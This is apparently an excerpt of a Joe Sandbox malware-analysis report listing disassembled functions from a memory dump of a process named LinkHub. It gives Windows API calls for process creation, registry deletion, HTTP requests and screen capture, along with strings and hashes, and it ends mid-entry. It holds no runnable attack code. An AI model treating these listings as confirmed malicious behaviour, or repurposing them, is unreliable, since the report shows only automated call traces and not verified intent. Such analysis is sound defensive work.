_wcslen.LIBCMT ref: 00B8BD92

Part of subcall function 00B70F4E: GetStdHandle.KERNEL32(000000F6), ref: 00B70F6D

_wcslen.LIBCMT ref: 00B8BDAB
_wcslen.LIBCMT ref: 00B8BDC6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B8BE16
GetLastError.KERNEL32(00000000), ref: 00B8BE67
CloseHandle.KERNEL32(?), ref: 00B8BE99
CloseHandle.KERNEL32(00000000), ref: 00B8BEAA
CloseHandle.KERNEL32(00000000), ref: 00B8BEBC
CloseHandle.KERNEL32(00000000), ref: 00B8BECE
CloseHandle.KERNEL32(?), ref: 00B8BF43

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: ee5a00b85af4444a0b605a9af28fa6b2fc39a1fe7a5ff5d953dbb808ce537794
Instruction ID: 5d1581dc4945adaeb7c801251c675e46b2696911d612dee9c59e66aef80497f0
Opcode Fuzzy Hash: ee5a00b85af4444a0b605a9af28fa6b2fc39a1fe7a5ff5d953dbb808ce537794
Instruction Fuzzy Hash: 29F17B716083409FC714EF34C991B6ABBE1EF84310F18899DF9999B2A2CB71ED45CB52

Function 00B84A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00B9DCD0), ref: 00B84B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B84B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00B9DCD0), ref: 00B84B4F
FreeLibrary.KERNEL32(00000000,?,00B9DCD0), ref: 00B84B9B
StringFromGUID2.OLE32(?,?,00000028,?,00B9DCD0), ref: 00B84C05
SysFreeString.OLEAUT32(00000009), ref: 00B84CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B84D25
SysFreeString.OLEAUT32(?), ref: 00B84D4F

Strings

GetModuleHandleExW, xrefs: 00B84B24
kernel32.dll, xrefs: 00B84B13

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: 50e4a9cb72400c35e2130f5c76440b7cf5d9192f3f63add9208627ab4848fac4
Instruction ID: 71a739e81e98aa790e4b7496d20930e0f3d4b3e9aadc426c238d34b5d20a5d36
Opcode Fuzzy Hash: 50e4a9cb72400c35e2130f5c76440b7cf5d9192f3f63add9208627ab4848fac4
Instruction Fuzzy Hash: 20120B71A00216EFDB14DF94C984EAEBBF5FF45314F148099E909AB261DB31ED46CBA0

Function 00B0381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00BD29C0), ref: 00B43F72
GetMenuItemCount.USER32(00BD29C0), ref: 00B44022
GetCursorPos.USER32(?), ref: 00B44066
SetForegroundWindow.USER32(00000000), ref: 00B4406F
TrackPopupMenuEx.USER32(00BD29C0,00000000,?,00000000,00000000,00000000), ref: 00B44082
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B4408E

Strings

0, xrefs: 00B0382D

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 3fc26a13b15ff86046eaba806797c580411718963e0fbd77ed8294653963c510
Instruction ID: da4376a836191d015f7c76a4206d7c0c5cc789874ab21f7be849e7db771c9fed
Opcode Fuzzy Hash: 3fc26a13b15ff86046eaba806797c580411718963e0fbd77ed8294653963c510
Instruction Fuzzy Hash: 2C71F530644305BEEB218F29DC89FAABFE8FF05B64F144296F514661E0C771AE64D750

Function 00B97711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00B97823

Part of subcall function 00B08577: _wcslen.LIBCMT ref: 00B0858A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B97897
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B978B9
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B978CC
DestroyWindow.USER32(?), ref: 00B978ED
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B00000,00000000), ref: 00B9791C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B97935
GetDesktopWindow.USER32 ref: 00B9794E
GetWindowRect.USER32(00000000), ref: 00B97955
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B9796D
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B97985

Part of subcall function 00B02234: GetWindowLongW.USER32(?,000000EB), ref: 00B02242

Strings

0, xrefs: 00B977D0
tooltips_class32, xrefs: 00B97890, 00B97915

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 42af4ee6885c98d8cb4169e188f70cd9eeb18553de6c4de4dbf472a12f3a17f3
Instruction ID: c25fa57a30e33a1d646b1f571cb9284759a1fd1896fa5423e7723eb74413aaa7
Opcode Fuzzy Hash: 42af4ee6885c98d8cb4169e188f70cd9eeb18553de6c4de4dbf472a12f3a17f3
Instruction Fuzzy Hash: B971AB70148244AFDB21CF59CC58FAABBF9FB89300F1444AEF985872A1DB74E906CB11

Function 00B99B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B024B0

DragQueryPoint.SHELL32(?,?), ref: 00B99BA3

Part of subcall function 00B980AE: ClientToScreen.USER32(?,?), ref: 00B980D4
Part of subcall function 00B980AE: GetWindowRect.USER32(?,?), ref: 00B9814A
Part of subcall function 00B980AE: PtInRect.USER32(?,?,?), ref: 00B9815A

SendMessageW.USER32(?,000000B0,?,?), ref: 00B99C0C
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B99C17
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B99C3A
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B99C81
SendMessageW.USER32(?,000000B0,?,?), ref: 00B99C9A
SendMessageW.USER32(?,000000B1,?,?), ref: 00B99CB1
SendMessageW.USER32(?,000000B1,?,?), ref: 00B99CD3
DragFinish.SHELL32(?), ref: 00B99CDA
DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00B99DCD

Strings

@GUI_DRAGFILE, xrefs: 00B99D7C
@GUI_DRAGID, xrefs: 00B99D45
@GUI_DROPID, xrefs: 00B99CFA

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 06840c0f3060099f1e9902cca03213fcca37408b1973777a2caeab3386583379
Instruction ID: 025512aeed8b8822798ebef97ba3fd0fda75010f7fef0233d5f8c8adeda480af
Opcode Fuzzy Hash: 06840c0f3060099f1e9902cca03213fcca37408b1973777a2caeab3386583379
Instruction Fuzzy Hash: 3C616871108301AFC701EF64DC85EAFBBE9EF98750F4009AEF591932A1DB719A49CB52

Function 00B7CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B7CEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B7CF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B7CF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B7CF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00B7CF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B7CF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B7CF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B7CFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B7D021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B7D035
InternetCloseHandle.WININET(00000000), ref: 00B7D040

Strings

, xrefs: 00B7CFBA

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 4c75d0e0277569fd3535df9e227b3cfdc704cb5c2af3b419fa7d8adf959c1198
Instruction ID: 91ddebe45ff9901008be696ef1d95a6229d9b8850f1b469fa6106d1aa0b737ba
Opcode Fuzzy Hash: 4c75d0e0277569fd3535df9e227b3cfdc704cb5c2af3b419fa7d8adf959c1198
Instruction Fuzzy Hash: 63514BB1500604BFDB219FA1C988AAB7BFCFF09794F00845EF95997250DB34DD49AB60

Function 00B98FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00B966D6,?,?), ref: 00B98FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00B966D6,?,?,00000000,?), ref: 00B98FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00B966D6,?,?,00000000,?), ref: 00B99009
CloseHandle.KERNEL32(00000000,?,?,?,?,00B966D6,?,?,00000000,?), ref: 00B99016
GlobalLock.KERNEL32(00000000), ref: 00B99024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B966D6,?,?,00000000,?), ref: 00B99033
GlobalUnlock.KERNEL32(00000000), ref: 00B9903C
CloseHandle.KERNEL32(00000000,?,?,?,?,00B966D6,?,?,00000000,?), ref: 00B99043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B966D6,?,?,00000000,?), ref: 00B99054
OleLoadPicture.OLEAUT32(?,00000000,00000000,00BA0C04,?), ref: 00B9906D
GlobalFree.KERNEL32(00000000), ref: 00B9907D
GetObjectW.GDI32(00000000,00000018,?), ref: 00B9909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00B990CD
DeleteObject.GDI32(00000000), ref: 00B990F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B9910B

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: ebb686301990f1bd315c8ba6cb3ffc4beb72bcc906e60ede3656b86c39cecc02
Instruction ID: 31d800e77ced2cb099efb6ee00063d3437e81f6c2616beae9c144876f448d563
Opcode Fuzzy Hash: ebb686301990f1bd315c8ba6cb3ffc4beb72bcc906e60ede3656b86c39cecc02
Instruction Fuzzy Hash: A3413C75600204BFDB219F6ADD88EAE7BB8FF89711F108069F915D7260DB319D41CB20

Function 00B8C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0B329: _wcslen.LIBCMT ref: 00B0B333

Part of subcall function 00B8D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B8C10E,?,?), ref: 00B8D415
Part of subcall function 00B8D3F8: _wcslen.LIBCMT ref: 00B8D451
Part of subcall function 00B8D3F8: _wcslen.LIBCMT ref: 00B8D4C8
Part of subcall function 00B8D3F8: _wcslen.LIBCMT ref: 00B8D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B8C154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B8C1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 00B8C26A
RegCloseKey.ADVAPI32(?), ref: 00B8C2DE
RegCloseKey.ADVAPI32(?), ref: 00B8C2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00B8C352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B8C364
RegDeleteKeyW.ADVAPI32(?,?), ref: 00B8C382
FreeLibrary.KERNEL32(00000000), ref: 00B8C3E3
RegCloseKey.ADVAPI32(00000000), ref: 00B8C3F4

Strings

advapi32.dll, xrefs: 00B8C34D
RegDeleteKeyExW, xrefs: 00B8C35E

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: bbdb8a1b3abbb26341522bcfb60b2a4fad0d084ea5584e9fe7fc868d8668cff6
Instruction ID: 470f2fed2748ee7022ccdd57b5f77487dc5c16edea4574653442c44ed47fa583
Opcode Fuzzy Hash: bbdb8a1b3abbb26341522bcfb60b2a4fad0d084ea5584e9fe7fc868d8668cff6
Instruction Fuzzy Hash: BDC17B70204201AFD710EF64C495F2ABBE1FF84304F1489DDE49A8B6A2CB71ED46CBA1

Function 00B82FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B83035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B83045
CreateCompatibleDC.GDI32(?), ref: 00B83051
SelectObject.GDI32(00000000,?), ref: 00B8305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00B830CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00B83109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00B8312D
SelectObject.GDI32(?,?), ref: 00B83135
DeleteObject.GDI32(?), ref: 00B8313E
DeleteDC.GDI32(?), ref: 00B83145
ReleaseDC.USER32(00000000,?), ref: 00B83150

Strings

(, xrefs: 00B830EA

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 5189cdfa20547cd3380829c2d9f0662467fa4e612c692aff224ec949f40b9cda
Instruction ID: 703d00ac1321520123a59e24bcecda15557f467f94d9496675c7cf557f27af9c
Opcode Fuzzy Hash: 5189cdfa20547cd3380829c2d9f0662467fa4e612c692aff224ec949f40b9cda
Instruction Fuzzy Hash: 0A61F1B6D00219AFCF04DFA8D984EAEBBF5FF48710F20845AE559A7210D771AA41CF90

Function 00B9A94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B024B0

GetSystemMetrics.USER32(0000000F), ref: 00B9A990
GetSystemMetrics.USER32(00000011), ref: 00B9A9A7
GetSystemMetrics.USER32(00000004), ref: 00B9A9B3
GetSystemMetrics.USER32(0000000F), ref: 00B9A9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00B9AC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B9AC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B9AC54
ShowWindow.USER32(00000003,00000000), ref: 00B9AC73
InvalidateRect.USER32(?,00000000,00000001), ref: 00B9AC95
DefDlgProcW.USER32(?,00000005,?), ref: 00B9ACBB

Strings

@, xrefs: 00B9ABD0

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @
API String ID: 3962739598-2766056989
Opcode ID: e2d7ef099d302b57498439692af9b7588e17f55dedce2b399bd25fb6f858adb7
Instruction ID: 56d4fc7f8c8b125580b8e4d6500a630c2e014e95892c2fc02ada5dd63e305a53
Opcode Fuzzy Hash: e2d7ef099d302b57498439692af9b7588e17f55dedce2b399bd25fb6f858adb7
Instruction Fuzzy Hash: 96B17931600219ABCF14CF69CA857AE7BF2FF44700F1580B9EC48AB295DB74A980CB91

Function 00B652AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00B652E6
GetWindowTextW.USER32(?,?,00000400), ref: 00B65328
_wcslen.LIBCMT ref: 00B65339
CharUpperBuffW.USER32(?,00000000), ref: 00B65345
_wcsstr.LIBVCRUNTIME ref: 00B6537A
GetClassNameW.USER32(00000018,?,00000400), ref: 00B653B2
GetWindowTextW.USER32(?,?,00000400), ref: 00B653EB
GetClassNameW.USER32(00000018,?,00000400), ref: 00B65445
GetClassNameW.USER32(?,?,00000400), ref: 00B65477
GetWindowRect.USER32(?,?), ref: 00B654EF

Strings

ThumbnailClass, xrefs: 00B653BD, 00B65450

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: f6f00e8022574224e5d13a463a1e6959a0a0d011b0e5ae58a775c3686eaa9742
Instruction ID: 123d6b78a3c1836197d5864bad7a251245b25214372988139336cc00555c1f59
Opcode Fuzzy Hash: f6f00e8022574224e5d13a463a1e6959a0a0d011b0e5ae58a775c3686eaa9742
Instruction Fuzzy Hash: F191F771104B06AFD724CF24C994FAAB7E9FF10304F1045A9FA9A83191EB39ED65CB91

Function 00B9976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B024B0

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B997B6
GetFocus.USER32 ref: 00B997C6
GetDlgCtrlID.USER32(00000000), ref: 00B997D1
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00B99879
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B9992B
GetMenuItemCount.USER32(?), ref: 00B99948
GetMenuItemID.USER32(?,00000000), ref: 00B99958
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B9998A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B999CC
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B999FD

Strings

0, xrefs: 00B998FB

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 82a8360bb7f17d3b26fb8ea0a3f039dc6283b2b823747430f87efeae70eb0177
Instruction ID: 57b88756b74704b006dc08fadc334bc8cb685e4ccd2efa20182f71f0675370e1
Opcode Fuzzy Hash: 82a8360bb7f17d3b26fb8ea0a3f039dc6283b2b823747430f87efeae70eb0177
Instruction Fuzzy Hash: 7281E2715043019FDB50CF29D884A6BBBE8FF99354F1409AEF985A7291DB30D905CBA2

Function 00B6C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00BD29C0,000000FF,00000000,00000030), ref: 00B6C973
SetMenuItemInfoW.USER32(00BD29C0,00000004,00000000,00000030), ref: 00B6C9A8
Sleep.KERNEL32(000001F4), ref: 00B6C9BA
GetMenuItemCount.USER32(?), ref: 00B6CA00
GetMenuItemID.USER32(?,00000000), ref: 00B6CA1D
GetMenuItemID.USER32(?,-00000001), ref: 00B6CA49
GetMenuItemID.USER32(?,?), ref: 00B6CA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B6CAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B6CAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B6CB0C

Strings

0, xrefs: 00B6C904

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
